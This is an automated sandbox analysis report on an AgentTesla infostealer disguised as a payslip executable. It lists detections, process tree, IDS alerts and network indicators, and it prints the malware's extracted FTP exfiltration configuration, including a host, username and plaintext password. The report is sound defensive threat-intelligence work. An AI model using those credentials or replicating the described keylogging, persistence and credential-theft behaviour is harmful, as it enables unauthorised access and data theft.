Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payslip_October_2024.exe

Overview

General Information

Sample name:Payslip_October_2024.exe
Analysis ID:1548796
MD5:a0dadb7997e2b13144275b1c164f1c84
SHA1:6f63137c9a20c05c04b53eaea60eae9355022a97
SHA256:7602098a6b2a95ca014488ce7c67b273a6189d7cc4daa09fb639c32fc21afa99
Tags:AgentTeslaexeuser-threatcat_ch
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Payslip_October_2024.exe (PID: 7532 cmdline: "C:\Users\user\Desktop\Payslip_October_2024.exe" MD5: A0DADB7997E2B13144275B1C164F1C84)
    • Payslip_October_2024.exe (PID: 7692 cmdline: "C:\Users\user\Desktop\Payslip_October_2024.exe" MD5: A0DADB7997E2B13144275B1C164F1C84)
  • sgxIb.exe (PID: 7952 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: A0DADB7997E2B13144275B1C164F1C84)
    • sgxIb.exe (PID: 8000 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: A0DADB7997E2B13144275B1C164F1C84)
    • sgxIb.exe (PID: 8008 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: A0DADB7997E2B13144275B1C164F1C84)
  • sgxIb.exe (PID: 7324 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: A0DADB7997E2B13144275B1C164F1C84)
    • sgxIb.exe (PID: 6128 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: A0DADB7997E2B13144275B1C164F1C84)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.haliza.com.my", "Username": "origin@haliza.com.my", "Password": "JesusChrist007$"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000005.00000002.1889661399.0000000002B91000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.1889661399.0000000002B91000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000005.00000002.1889661399.0000000002BBC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000005.00000002.1886245023.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000005.00000002.1886245023.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 18 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              5.2.sgxIb.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                5.2.sgxIb.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  5.2.sgxIb.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x34f7c:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x34fee:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x35078:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x3510a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x35174:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x351e6:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x3527c:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x3530c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  5.2.sgxIb.exe.400000.0.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                  • 0x32170:$s2: GetPrivateProfileString
                  • 0x317fa:$s3: get_OSFullName
                  • 0x32f6b:$s5: remove_Key
                  • 0x33157:$s5: remove_Key
                  • 0x34075:$s6: FtpWebRequest
                  • 0x34f5e:$s7: logins
                  • 0x354d0:$s7: logins
                  • 0x38227:$s7: logins
                  • 0x38293:$s7: logins
                  • 0x39d12:$s7: logins
                  • 0x38e2d:$s9: 1.85 (Hash, version 2, native byte-order)
                  0.2.Payslip_October_2024.exe.49c6e28.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 17 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Payslip_October_2024.exe, ProcessId: 7692, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sgxIb

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-04T21:25:12.909275+010020229301A Network Trojan was detected4.245.163.56443192.168.2.449742TCP
                    2024-11-04T21:25:52.030022+010020229301A Network Trojan was detected4.245.163.56443192.168.2.449755TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-04T21:25:13.322096+010020299271A Network Trojan was detected192.168.2.449741110.4.45.19721TCP
                    2024-11-04T21:25:22.350303+010020299271A Network Trojan was detected192.168.2.449751110.4.45.19721TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-04T21:25:14.233376+010028555421A Network Trojan was detected192.168.2.449746110.4.45.19752210TCP
                    2024-11-04T21:25:14.238674+010028555421A Network Trojan was detected192.168.2.449746110.4.45.19752210TCP
                    2024-11-04T21:25:23.295388+010028555421A Network Trojan was detected192.168.2.449752110.4.45.19754816TCP
                    2024-11-04T21:25:23.301069+010028555421A Network Trojan was detected192.168.2.449752110.4.45.19754816TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 0.2.Payslip_October_2024.exe.49c6e28.1.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.haliza.com.my", "Username": "origin@haliza.com.my", "Password": "JesusChrist007$"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeReversingLabs: Detection: 31%
                    Multi AV Scanner detection for submitted file
                    Source: Payslip_October_2024.exeReversingLabs: Detection: 31%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: Payslip_October_2024.exeJoe Sandbox ML: detected
                    Source: Payslip_October_2024.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49740 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49750 version: TLS 1.2
                    Source: Payslip_October_2024.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 4x nop then jmp 0E584654h0_2_0E584845

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49746 -> 110.4.45.197:52210
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49741 -> 110.4.45.197:21
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49752 -> 110.4.45.197:54816
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49751 -> 110.4.45.197:21
                    Connects to many ports of the same IP (likely port scanning)
                    Source: global trafficTCP traffic: 110.4.45.197 ports 49859,49239,65028,64457,59440,56373,56495,57287,63989,50371,60511,52210,52997,54816,60390,62468,59156,1,57997,51271,2,59616,58004,54487,60363,59816,21,61072,63370
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.4:49738 -> 110.4.45.197:49239
                    Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                    Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                    Source: Joe Sandbox ViewIP Address: 110.4.45.197 110.4.45.197
                    Source: Joe Sandbox ViewASN Name: EXABYTES-AS-APExaBytesNetworkSdnBhdMY EXABYTES-AS-APExaBytesNetworkSdnBhdMY
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.4:49742
                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.4:49755
                    Source: unknownFTP traffic detected: 110.4.45.197:21 -> 192.168.2.4:49735 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 04:24. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 04:24. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 04:24. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 04:24. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                    Source: global trafficDNS traffic detected: DNS query: ftp.haliza.com.my
                    Source: Payslip_October_2024.exe, 00000002.00000002.4125026006.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp, Payslip_October_2024.exe, 00000002.00000002.4125026006.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp, Payslip_October_2024.exe, 00000002.00000002.4125026006.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, Payslip_October_2024.exe, 00000002.00000002.4125026006.0000000002D0C000.00000004.00000800.00020000.00000000.sdmp, Payslip_October_2024.exe, 00000002.00000002.4125026006.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000005.00000002.1889661399.0000000002BBC000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4124052676.0000000002C2C000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4124052676.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4124052676.0000000002CE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.haliza.com.my
                    Source: Payslip_October_2024.exe, 00000002.00000002.4125026006.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000005.00000002.1889661399.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4124052676.0000000002BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Payslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: Payslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: Payslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: Payslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: Payslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: Payslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: Payslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: Payslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: Payslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: Payslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: Payslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: Payslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: Payslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: Payslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: Payslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: Payslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: Payslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: Payslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: sgxIb.exe, 00000005.00000002.1895502014.00000000063A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cogu7
                    Source: Payslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: Payslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: Payslip_October_2024.exe, 00000000.00000002.1680417478.0000000005EF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.comP;
                    Source: Payslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: Payslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: Payslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: Payslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: Payslip_October_2024.exe, 00000000.00000002.1680452057.0000000006FC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: Payslip_October_2024.exe, 00000000.00000002.1678620012.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000005.00000002.1886245023.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: Payslip_October_2024.exe, 00000000.00000002.1678620012.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, Payslip_October_2024.exe, 00000002.00000002.4125026006.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000005.00000002.1886245023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, sgxIb.exe, 00000005.00000002.1889661399.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4124052676.0000000002BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: Payslip_October_2024.exe, 00000002.00000002.4125026006.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000005.00000002.1889661399.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4124052676.0000000002BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: Payslip_October_2024.exe, 00000002.00000002.4125026006.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000005.00000002.1889661399.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4124052676.0000000002BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49740 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49750 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.Payslip_October_2024.exe.49c6e28.1.raw.unpack, SKTzxzsJw.cs.Net Code: _71ZRqC1D
                    Installs a global keyboard hook
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\Payslip_October_2024.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindow created: window name: CLIPBRDWNDCLASS

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 5.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 5.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.Payslip_October_2024.exe.49c6e28.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Payslip_October_2024.exe.49c6e28.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.Payslip_October_2024.exe.49c6e28.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Payslip_October_2024.exe.49c6e28.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 0_2_074A67300_2_074A6730
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 0_2_074AD5E00_2_074AD5E0
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 0_2_074A54600_2_074A5460
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 0_2_074A02B00_2_074A02B0
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 0_2_074A9A580_2_074A9A58
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 0_2_074AF6200_2_074AF620
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 0_2_074A02A00_2_074A02A0
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 0_2_074A9CD70_2_074A9CD7
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 0_2_074A9CE80_2_074A9CE8
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 0_2_074A9A490_2_074A9A49
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 0_2_074A8A380_2_074A8A38
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 0_2_0E5868D80_2_0E5868D8
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 0_2_0E5827D00_2_0E5827D0
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 0_2_0E5827C00_2_0E5827C0
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 0_2_0E580C700_2_0E580C70
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 0_2_0E580C600_2_0E580C60
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 0_2_0E5814E00_2_0E5814E0
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 0_2_0E5808380_2_0E580838
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 0_2_0E58109A0_2_0E58109A
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 0_2_0E5810A80_2_0E5810A8
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 2_2_00C7E9F82_2_00C7E9F8
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 2_2_00C74A682_2_00C74A68
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 2_2_00C7AD902_2_00C7AD90
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 2_2_00C73E502_2_00C73E50
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 2_2_00C741982_2_00C74198
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 2_2_04FB15502_2_04FB1550
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 2_2_04FB15402_2_04FB1540
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 2_2_0562C76C2_2_0562C76C
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 2_2_056255E32_2_056255E3
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 2_2_056255E82_2_056255E8
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 2_2_066256A82_2_066256A8
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 2_2_06627E902_2_06627E90
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 2_2_066267002_2_06626700
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 2_2_066235782_2_06623578
